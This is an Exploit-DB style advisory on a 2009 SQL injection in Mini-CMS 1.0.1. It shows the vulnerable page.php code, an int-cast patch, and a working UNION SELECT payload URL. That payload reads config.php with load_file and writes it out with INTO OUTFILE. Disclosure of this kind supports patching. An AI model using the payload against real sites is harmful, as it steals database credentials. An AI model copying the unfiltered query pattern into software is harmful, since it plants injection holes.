Mini-CMS 1.0.1 SQL inlection

vendor:

Mini-CMS

by:

Ins3t

9,3

CVSS

HIGH

SQL Injection

N/A

CWE

Product Name: Mini-CMS

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:mini-cms:mini-cms:1.0.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mini-CMS 1.0.1 SQL inlection

The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the database, and in the config.php file. The exploit code is http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+

Mitigation:

Patch the vulnerable code with the following code: <?php $id = (int)$_GET['id']; database_connect(); $query = "SELECT * from content WHERE id = $id"; $error = mysql_error(); if (!$result = mysql_query($query)) { print "$error"; exit; } while($row = mysql_fetch_object($result)){ $content = $row->text; print("$content"); } ?>

Source

Exploit-DB raw data:

[+]--------------------------------------------------------------------------------------------------------------------[+]
[+]--------------------------------------------[Mini-CMS 1.0.1 SQL inlection]------------------------------------------[+]  
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[INFO]----------------------------------------------------------------------------------------------------------------[+]
[+] Title:Mini-CMS 1.0.1 SQL inlection
[+] Autor: Ins3t
[+] Site: www.arthacking.net
[+] Date:08.08.2009
[+]--------------------------------------------------------------------------------------------------------------------[+]

-[BUG INFO]------------------------------------------------------------------------------------------------------------[+]
[+] The vulnerability occurs due to insufficient filtering transferred database parameters. Password is not in the 
database, and in the config.php file.
[+] Conditions: magic_quotes_gpc = Off | full patch of file config.php
[+] Code vulnerable functions:

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]
<?php
$id = $_GET['id'];
database_connect();
$query = "SELECT * from content
          WHERE id = $id";                      <------(BUG)
$error = mysql_error();
if (!$result = mysql_query($query)) {
    print "$error";
        exit;
        }

while($row = mysql_fetch_object($result)){
  $content = $row->text;
  print("$content");
        }
?>
[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]

[+] Exploit: 

[+]-------------------------------------------------[CODE]--------------------------------------------------------------[+]

http://localhost/page.php?id=-1+union+select+1,2,3,4,load_file('[FULL_PATCH_OF_FILE_CONFIG.PHP]'),6,7,8,9+into+outfile+'[FULL_PATCH]'--+

[+]------------------------------------------------[/CODE]--------------------------------------------------------------[+]

# milw0rm.com [2009-08-10]